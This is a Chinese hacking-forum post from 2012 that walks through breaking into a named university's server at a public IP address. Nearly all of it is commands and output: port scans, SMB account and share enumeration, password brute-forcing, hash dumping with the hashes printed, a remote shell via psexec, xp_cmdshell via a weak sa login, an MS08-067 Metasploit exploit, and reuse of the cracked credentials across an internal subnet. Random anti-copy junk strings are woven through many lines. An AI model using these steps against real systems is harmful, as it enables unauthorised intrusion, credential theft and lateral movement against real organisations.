中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/
; N- m. Y9 D' e/ |: I  G+ W8 q' U3 |( l4 Q0 E
root@bt:~# nmap -sS -sV 202.103.242.2414 v# z7 g0 j) k# M4 z+ U7 ~
& i- c; ?. m6 V  B: m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
3 H! x# f# n  W$ \; Z% G, S0 ^, {2 ~4 _3 ~9 U) p+ Y" q+ _! I- e9 G
Nmap scan report for bogon (202.103.242.241)8 e  _, J, y0 n' P. n
# R8 r0 J" L6 y; U1 p7 n: I% n
Host is up (0.00048s latency).
5 a9 |' r/ |' G$ B, J3 F) K# x! r8 L# D- u. H1 m
Not shown: 993 closed ports
  [2 N( |, ]1 ~8 W- k# u4 A0 r; A$ J7 S. ~2 A
PORT     STATE SERVICE       VERSION$ S, I1 I8 C1 ^: M9 ]

* }6 Z. u% F8 R1 I) d135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. Z9 C9 C' B/ m$ e
: p1 z  L: A3 R2 H4 H+ G9 ^139/tcp  open  netbios-ssn' i& u: ?/ N! r! b* i
2 ?) s/ ?0 }' z% f+ S% F) v
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
2 s: O  r, n. U! {; ]
: N0 P1 B: A: E0 F+ L& f1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)% s0 |2 F# j5 V2 G' ~2 ?
" A/ S$ T! t8 s* l. R& w! ^6 M
1026/tcp open  msrpc         Microsoft Windows RPC9 @7 H$ I0 _1 k; d, [0 W
) F' l- T3 B% g2 W
3372/tcp open  msdtc?
7 ^2 {. E/ u6 i1 u9 b2 M
# e0 s- O2 H6 P* ?3389/tcp open  ms-term-serv?# A; G( m3 w; o( H6 z, a' g: d
% t" `% d7 d/ ~) @8 }: _/ ?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :" R% i# I  r7 |, _, M
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
2 }8 B( [* {4 W% _. U  y# E# x5 I/ l. S% H, N3 H$ y7 M# b7 S% @2 w
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions( o1 j# J6 D9 U& p2 x2 M. z

% U+ d; ]# o  `7 S$ s' n9 V" N& A2 CSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)( v+ l. A% F  i4 o& ?4 n

& y4 F8 n8 K+ K1 bSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
: n& G& ~  Q+ P3 V; G4 m
: {3 C3 E2 G7 j1 P6 M( t- P- NSF:ptions,6,”hO\n\x000Z”);/ ?# F- ]- l+ M. _4 I
% Z1 e$ ~4 Z' X1 ~
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ a8 G6 u5 n% v5 p- C! |
; ~( ^) D( N7 J# Z* P0 |/ q# P
Service Info: OS: Windows
" D2 `. S9 d3 p" x  ]- B3 p9 |' j2 E" [  U1 W7 c
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
) E( D( G4 t; j2 z; x2 O+ ~( z. w+ v4 A0 W: l+ U) j( f% |
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
  |+ q* F4 U6 H) _; f  w! ~2 y; ]# |7 @' k1 ]1 I, q
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本- N$ r# g! b9 T
! J" |' U* s% ?0 {9 b0 M
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
0 ?+ U* \. {% k
: M9 t4 y. t8 D! c) s2 |-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
% Q. Y6 d* [" [- a2 ?# d# x$ e# n7 @) t: Z' x+ f4 U) A" Q1 w
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse+ a4 n- z4 m' Q5 r* e) Y/ i1 H3 o
4 y( _5 `' z; Q1 T8 Q" I2 K
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse+ P: P- B8 L2 f: H
) P' A+ L# F# c$ d) {* j
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
- d$ h! _: l" n5 c! ~# a2 {" M  p& s# f! V+ t
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
/ g; K; i- R  w$ y  k. E" }6 o$ ~# R' z. e3 P; T# s; h% }' c. ^
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse+ s' Y! I/ A" R6 G6 a3 }/ Y
4 D! G7 S1 B2 ?1 b2 g# N* p; T) l; L# Q& ]
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
4 J- G# ?  u8 w2 j5 B1 B& c7 q; p
! q  y/ \8 m2 }. c7 d-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse5 _: s# ?( }  I, f

2 N1 c' M: D. ~) B- o4 A) [% U-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse2 T' I: [2 m' W6 Y" O; U) @, P
1 Q0 O- c. @% Q7 H0 |' [% J4 z  U
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 Q& @" K! a  B9 F" ]9 E: M$ t* a9 R( z
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
$ @( k7 F  N+ M1 S6 Z) @, x9 c
1 L! P4 O  g$ J# |2 y$ n/ ?-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
& R) O0 V' m# h+ t8 o! p/ o/ ?- C( \! P3 _
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse# A9 k3 K' B8 V& K9 S

# a' l, _% K1 S4 y& d7 |( D-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse" W6 G# K! R2 A4 ?4 W/ x

9 R* d7 u1 `9 ?, w) }root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
  J- ^% [4 ~! l" R8 t- d" D: [9 q( f
3 |9 I0 i& n8 ]/ E# C4 q- U! ~" M  Z  P//此乃使用脚本扫描远程机器所存在的账户名/ S; c* b; e; w$ l

9 x/ I3 @! h; w4 W# e$ YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
) N5 e3 T7 I# O  K9 q0 r! U' D2 ]( o- W- ]
Nmap scan report for bogon (202.103.242.241)
: {" U( ]7 j$ W; Y; W/ n3 j0 b* W( b8 o+ ]$ c* z5 ]$ t  i
Host is up (0.00038s latency).) K% v+ W; f: q( n) `; z
9 B3 V9 F. a4 W/ `" e* f+ e
Not shown: 993 closed ports* v! q* _: g- N8 d% z6 j  J
: Z. R$ a' {8 F& A. J* G7 t
PORT     STATE SERVICE" Z7 p7 K3 j5 k

0 n3 u! |" c+ e135/tcp  open  msrpc
% ?3 K/ }& ]- r' Z/ x2 V" U
, {3 g0 s: C; ~1 p139/tcp  open  netbios-ssn" t: `3 N/ {' i  v6 }9 }+ I' p
9 e8 \. b, z! Q) m9 x
445/tcp  open  microsoft-ds
: F  O. I; ?, h% {' N$ G
3 A1 g% ~$ b, [7 A1025/tcp open  NFS-or-IIS% Q0 y! x; \$ H) J% \% b) t& w

5 z6 L: f; g: Z1 O9 o  R1026/tcp open  LSA-or-nterm
$ Q1 A2 N2 ]3 {& D# `. ?* X
2 j; O5 @+ i4 a3372/tcp open  msdtc# R/ C; S5 G5 p
7 B: l0 E: c( Y' i* w
3389/tcp open  ms-term-serv4 c: t& r0 `6 _: K) N, X- r
) a" v8 q+ Y  C1 U. B& _
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). ?2 w2 X6 U1 J1 ^9 h

8 R; P1 c0 [  q. EHost script results:
! |6 C7 F% {7 G' I2 J8 T- D# @. M% K1 s$ ?6 Q0 v* U
| smb-enum-users:4 ?- P  K* }4 z9 r! N2 j* @2 _

1 z  {8 \( V4 W! }|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
$ ]: [/ O; {1 s+ N6 ~8 I' w, i0 K( y# A
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
7 o! Q0 m4 a& n7 o$ b9 I9 @8 v# Z/ T: ^% [3 |( u
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
% M: u2 N, i3 V/ E# {' X
( J2 E4 V8 r/ A//查看共享2 \4 ~% F* w- E% m1 z; y7 R
/ i- h4 m  z0 ~& y  F/ J
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST8 R$ L( D0 v" T$ ]: U" F1 A' X

/ }4 r3 r7 a& |8 @Nmap scan report for bogon (202.103.242.241)1 O, T1 |! P, d2 k
4 h  }; ~  g( O( f
Host is up (0.00035s latency).
: R/ }4 m3 b: @3 g" c4 U
. a( q5 d. m4 Q) t. PNot shown: 993 closed ports' ?! `$ e0 z5 m8 ]( R8 N+ t

) Y5 ^! t  Y# c5 a, f3 l5 \PORT     STATE SERVICE- ?$ j" D1 q7 M9 O
6 v! k) E6 X; S0 f& `
135/tcp  open  msrpc" `8 Y# o( j' C' X6 k7 h
( W" d! Q6 Y7 x! N! }
139/tcp  open  netbios-ssn
( }' p& b  R2 T2 n2 s1 [  D4 l6 a1 G5 j7 t' c  S$ T
445/tcp  open  microsoft-ds
8 Q; X8 a: N# u% I* S7 n
1 s- W! f- ^7 x, X; U1025/tcp open  NFS-or-IIS
, j$ _" M( w; b: q( |& V# q6 ~3 q+ Q0 b! S1 T
1026/tcp open  LSA-or-nterm
+ w2 j# m7 E: ]3 L! v
1 o6 H$ P4 t5 R3 r' [  s$ l8 X3372/tcp open  msdtc
9 @4 j+ k( f! @! J. M: ~1 {; M$ W- p# O; u; o% V2 Z: t
3389/tcp open  ms-term-serv! R, s7 z; }/ t' y2 j7 @8 B

6 P' i3 c! @& ?1 zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) Q# k2 A- }3 E2 A& X7 {- L

/ z. n5 ?' y) `* _8 G( FHost script results:) s6 ]$ q+ n) G0 V0 Q; o

2 O, b) X7 F; }* A5 U1 k| smb-enum-shares:: }: v# O* a- n

/ ?+ E8 t: B2 q) n% n# S0 a  z4 b|   ADMIN$
& R3 C# Y* w  _2 L' ^4 f  x1 \
/ Y; t) [5 c/ G% E: A- q! X|     Anonymous access: <none>
2 R% P& h* I3 m3 j
# o8 q9 E+ N9 Z* Z! l4 B|   C$" x1 j; m; X" c# [* x4 r+ N/ v) ~: C
, ]- X' \+ C" z$ u
|     Anonymous access: <none>
: t4 f+ P& y6 a: a5 Q% B8 A2 A2 e
|   IPC$8 _4 L! t1 m+ D6 ?. x! ]: L% N" e
( I) Q1 S0 U9 ~& i7 H( Q
|_    Anonymous access: READ5 y, Z) T* X  P- F$ V8 l

$ p9 R. H& v' f* Q2 bNmap done: 1 IP address (1 host up) scanned in 1.05 seconds  ?. o* y1 I; y) F6 `" w
3 b2 |" o! p$ a( W8 W  g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
, b# O+ {) {3 g1 V$ q, k3 q3 e7 q+ Q, `& Q; I, Z" M) M- g2 |
//获取用户密码$ H! m+ J9 \; ^9 M! }
. K4 U' U  \! l5 {6 r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
9 E7 ]( W7 k) v, ?2 ~* O5 K- W5 B6 \) A% V. D( x' T9 i+ `
Nmap scan report for bogon (202.103.242.2418)
( F# [& j" I0 C$ O$ h6 b
  x4 r- c$ V  W4 M1 y  v* q$ t# LHost is up (0.00041s latency).
% F  |. `; Y3 X4 [( {+ ?: n7 `: h: j% P7 w- g! U! \
Not shown: 993 closed ports9 z2 `% X1 _% }: D

% H- F/ R1 o, c$ N" K- ?7 PPORT     STATE SERVICE
% M+ y6 q; }& Y* d7 Y9 z+ X# g. S
, D% ~6 G- F" `. ^135/tcp  open  msrpc# r7 Z- C; p9 \6 J- t0 X) {

' P7 C# V: N8 y( l139/tcp  open  netbios-ssn' f% U) _+ k6 Z

8 R8 z8 |' n0 H) [1 Y) `+ t445/tcp  open  microsoft-ds
$ i! Z& E7 x0 _& o" P! |4 J# T& f5 r) ^& f  z
1025/tcp open  NFS-or-IIS
3 @( @; x9 j, }1 j5 y3 ]+ T0 @0 k; Y$ N: o
1026/tcp open  LSA-or-nterm* \0 f( Z: Y7 Y

/ \' n% r4 t2 ^$ F* m; Z3372/tcp open  msdtc
0 e9 U2 r3 g( V1 l* z" Q5 U. X, ~3 T- y1 ?
3389/tcp open  ms-term-serv
. n0 k$ P2 K3 S0 H4 u+ E9 Q- I: E0 s! T( V$ y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( g3 L! \* }. S, y' v# ]1 y: F9 Q5 _0 v+ e, w9 l$ r& j- E2 Y  ]( V3 ~
Host script results:
! i0 n5 U) N; [, H. y# b, @
  c3 F% a1 V" G" D! q$ ~| smb-brute:
; t& _4 R, x5 V& f# E/ G, S, F4 X! `
administrator:<blank> => Login was successful
3 N) o; m+ g( |+ v
9 @4 L) O4 G7 [|_  test:123456 => Login was successful9 w$ w7 p7 j  v9 `7 U& N

# m" j, x% Q: C  c$ T9 K, mNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 x( f- @& v2 X0 i* u: E
: O6 ^6 _# E8 Q( C+ p0 {$ yroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
/ @: X( i! u0 N- B! e# H4 K; I% i* @/ ~9 t1 ^1 R; m% o! J
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data9 w' @$ O0 ?/ v- B

8 i# t0 `) D$ l' S) b% Groot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
0 J- m: F1 S9 R! D0 v1 ?6 B4 F4 e) Q8 O2 x) V
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139/ l. t3 l) Y( G

: m" T$ |0 _( t& s! d: cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST& c' }* ^8 z' P+ V- _
( |+ T  F' J. p6 }+ W- H" S. e
Nmap scan report for bogon (202.103.242.241)
& {3 ~0 J- U: T! R  J; J
9 B; T( H. v% U6 @Host is up (0.0012s latency).
% e: |* H9 }) V1 w7 x3 c* ^( x. k% v+ d* v
PORT    STATE SERVICE
0 m$ X" Q# G  J7 G$ T' ^" @# }: P3 v( _8 J
135/tcp open  msrpc! p/ }1 m, _& c2 H7 ~7 T
$ g9 C. p0 m# E0 |4 A* T
139/tcp open  netbios-ssn5 J( ^" v& U' m* E; q/ [5 P8 M

) y, u5 M6 z" A6 J/ n3 v445/tcp open  microsoft-ds$ G. J2 G' _7 Q

$ s% J& a) X9 W" c$ X$ t( zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 a/ X. G# N% B' a) Y1 k
- f+ V! S9 J" i8 k( q5 WHost script results:' y: ^( V9 B* g2 o$ K, F1 ?5 Y

: l; _( h8 {3 Z; c/ J| smb-pwdump:5 z. y- Z/ N2 Z! J

- q  A9 H" x/ t| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************% `3 }% K9 {* |; y

  r' |; i5 t+ R$ L" W1 b| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************, n, M7 Z, T7 @. z- q  U" S

+ G- {  g$ P- i0 t! E! @, F| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
9 }. r: q, k7 D& n1 m5 T8 Z. E! l. \' ?
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2! ~1 X( J; N6 x8 x  S. U
* T2 F3 H' e) O( n4 O: z
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds+ d6 X& y! O$ _) m* J( ?0 z3 o
- S0 E' o6 k  i( ?
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
3 b2 _+ z" i! X" ]- K. ]) i# f9 r6 \6 z& g9 f
-p 123456 -e cmd.exe0 H% m9 d2 F' O8 w
- Q3 s( t' T# G. y9 x* R
PsExec v1.55 – Execute processes remotely
+ A% j4 }% d& f# ?, t) t7 y5 c9 ~& a8 e
Copyright (C) 2001-2004 Mark Russinovich. W. G/ e+ U( G  v5 ^

6 B6 `* G0 H. g2 t: Y: t7 h( PSysinternals – www.sysinternals.com
9 n" A& `- W4 R2 C( A) h
2 q7 \$ h9 \( jMicrosoft Windows 2000 [Version 5.00.2195]7 K$ ?# S1 I, P  L1 \9 _8 B! v9 t! C

/ p, F- Z) f7 m& A(C) 版权所有 1985-2000 Microsoft Corp./ |7 `' W7 y2 ^; |. F0 G

# V. j* z5 q" Z' f$ EC:\WINNT\system32>ipconfig3 Q! u3 S" ~6 e  [

) }# y0 K/ g/ M% ]# b( \Windows 2000 IP Configuration6 |9 l* m. h$ i. J. r

9 C; s0 Y* K: A, z& w2 FEthernet adapter 本地连接:
8 J$ Y: N8 E, j" U' u- w1 A. M4 j' S
Connection-specific DNS Suffix  . :9 I! W8 U& w4 j3 p
6 _8 ]! |5 O& c9 l& _
IP Address. . . . . . . . . . . . : 202.103.242.241: h7 G3 S, [; s) g$ @2 q

. s9 Z' m' c) Z; F" j1 x+ bSubnet Mask . . . . . . . . . . . : 255.255.255.0
2 t2 u5 X" w  n% N, F$ a3 q4 i) n9 I: v8 [& v, d5 F
Default Gateway . . . . . . . . . : 202.103.1.1
; B0 v5 [0 A2 g( M/ u8 |8 ~* J& n2 C2 q# v+ }
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
5 @& l3 }$ Y! A  ]  M  @* V1 n
5 ?0 C7 p5 [. p1 e, Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞% c; z) v2 m- |. w/ p7 O
' |. {1 U' p9 z% X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST0 _/ G' Q  r' @& P, }0 T  q

- |- Z! U, g9 J% T8 v, H+ VNmap scan report for bogon (202.103.242.241)& Z: n5 N/ n! {! c/ r- w% w
( @' g1 ?1 d/ g2 @6 x+ f2 Y
Host is up (0.00046s latency).
) @# j- X' B7 e6 r, j1 {4 m% i, D( B/ G" k& j
Not shown: 993 closed ports
1 v7 l6 J  D, a- J
8 W( R: X& a  {3 O8 V  L+ n% OPORT     STATE SERVICE1 U, W# |+ k6 X* `' I" u2 Z4 \: K

3 @, T( {/ F& n. |135/tcp  open  msrpc
) @+ V, r# n1 e/ W- `  m, q5 q1 t/ l( ]4 t( q
139/tcp  open  netbios-ssn) c2 d+ {8 u" c& Y& l
1 K' L& L" f3 Q# G2 n/ Y
445/tcp  open  microsoft-ds& `& ^$ i- F' X( E8 ^9 B

' J: E, Q* D6 D. p4 j! x% t" }1025/tcp open  NFS-or-IIS$ ?, B) i! q% c5 P

$ w2 ^0 h8 o. U; V' e% j6 y$ m1026/tcp open  LSA-or-nterm
( R5 T1 }( D" O  X0 V- B! R& p& L* A- H$ r
3372/tcp open  msdtc
$ w( r. z$ s- A5 |% M8 _, A0 V0 K
, {) V5 c$ |  }2 |# z3389/tcp open  ms-term-serv
' i6 X% K- y" b: L* o
. Y/ e  \0 F: N, @MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ w2 ~- N. c8 M4 m: _# T$ \8 z
: b* A6 w2 n2 O  CHost script results:
$ _" d% O3 d' k. \% Q4 r
/ E7 E& w+ \4 N" @) R. R| smb-check-vulns:+ Z* m, v! f8 q# F. f

2 o" _& Z% B2 G/ v4 ^|_  MS08-067: VULNERABLE0 Y" b6 k  F6 Z; P& R6 Z5 T

% C' G& u4 U! k" W/ m& M! A8 H& tNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
% k/ f2 p3 ]8 h* h2 ~9 D" N% b0 @, G+ D$ b0 e+ S
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出0 i' ?) @6 Q9 _1 r; M
4 X2 M+ ]4 ~4 t! ?$ Z3 {, B
msf > search ms08
- S: }# c, x9 V) W( ^% g$ A7 G# \$ `4 t2 t# E8 T# |
msf > use exploit/windows/smb/ms08_067_netapi
6 v0 F8 A& C, p
+ f/ ^/ \9 ~5 T# e) A9 y3 N6 O! \msf  exploit(ms08_067_netapi) > show options
* S/ N; O, O- K/ ^8 \. s( n  ~/ i! p3 W' [9 ?! K
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241, s3 {* D- t( x; [
3 Z* w9 I( [5 R2 m
msf  exploit(ms08_067_netapi) > show payloads3 ?7 U) ?0 u. e4 @- ]8 O( \
, ]* \0 R1 \6 [0 j3 v& X! ]  ^
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 o4 v! g* P8 _

& @* Z" _! T5 J! G7 S4 Z* zmsf  exploit(ms08_067_netapi) > exploit4 E3 c0 n5 g1 X. s1 |, ?  j9 D

5 t: d2 R. J* O8 X# hmeterpreter >( O- j: b5 _* L+ v' `

4 e5 [9 T  x) j. qBackground session 2? [y/N]  (ctrl+z)2 n% N; Q8 E6 u& C0 m

1 v. e) d. V! a$ p* n( }) Wmsf  exploit(ms08_067_netapi) > sessions -l! Z" O/ t. ^7 c( S3 X. f1 h% m

3 J# `' _' O3 uroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt4 g& p% v% h0 t9 r  X# F
. x# U  k2 n" G
test6 q4 n  B2 J- N& W. O$ J/ J

, Q0 l; l- A* ]2 Tadministrator9 w4 K  Y5 o* U
5 p* e$ {8 z& \0 e9 u6 y* |# f
root@bt:/usr/local/share/nmap/scripts# vim password.txt
' W3 z% M# Z. v% l, \+ U2 h! e8 L  \. M
44EFCE164AB921CAAAD3B435B51404EE% K. F& I+ @6 b3 J

4 C1 d$ s9 t( g. m3 o. e: d3 Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
- _% k/ |8 j  H- X3 f+ T  c. O1 J0 r6 R& b. h
//利用用户名跟获取的hash尝试对整段内网进行登录% {7 Y8 q' n. f, g, e9 r3 F  ^) `

$ I6 A5 p( _" r) h8 y. k3 nNmap scan report for 192.168.1.105
6 W% ?" _; R3 j
9 O7 o! L- P+ G. T" d2 _# lHost is up (0.00088s latency).
2 @, Y) T  k7 @- x1 Z
# Y6 z/ |3 n1 s& e3 i) `# f' ~Not shown: 993 closed ports% h* ^6 S1 c& X8 O  _, ?% \4 t' ^3 p
- `2 n- B4 T" k( M; Q7 k: \! v
PORT     STATE SERVICE' ?5 R  ?1 z7 z) O3 |  x) {3 l
) V* k' [- \8 X* b/ k6 o& y
135/tcp  open  msrpc
+ k3 H: L! |7 k8 _9 Z$ b: Z- q( y/ b* I! w; ?3 X  D
139/tcp  open  netbios-ssn0 v& S9 e- p) i, Q2 g2 @

9 w9 e9 V, q* e/ N4 L445/tcp  open  microsoft-ds
# T, m2 i7 A5 V: a+ z. {8 G
5 Q0 f& V  [1 V' c9 M  p- s( f' X6 N1025/tcp open  NFS-or-IIS
1 o9 r' n" a  @
* w# K7 f; I; n' b  R$ a; Q5 {8 h1026/tcp open  LSA-or-nterm, V' g; e( E  ~2 I" O' [

: d. X+ o+ w/ H3 T. o* [3372/tcp open  msdtc# c/ d3 [" y9 n: Q
" s; G( z" `# J  _# a9 ^( z
3389/tcp open  ms-term-serv
8 O0 u) y) g# D* b1 P/ l7 w; i
, x* t- b8 K+ O5 g3 P" p, Q  `' pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% |8 G6 `* t( y1 V( S3 b. Z$ x
5 s! m8 \# _: G+ wHost script results:
+ j  E' S6 {) X6 ^
; O7 W4 n% b. E| smb-brute:
$ F: t( g7 l$ ~
: Y3 j9 M2 {  D& V$ M3 H" N|_  administrator:<blank> => Login was successful
2 M3 o8 \4 Z; s; ~
/ n) i( N( o( {2 @' M, s% [3 k攻击成功,一个简单的msf+nmap攻击~~·
; S; l) A' J( o/ b/ s6 D& y. S$ _# U' u# ?, P/ t* S




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2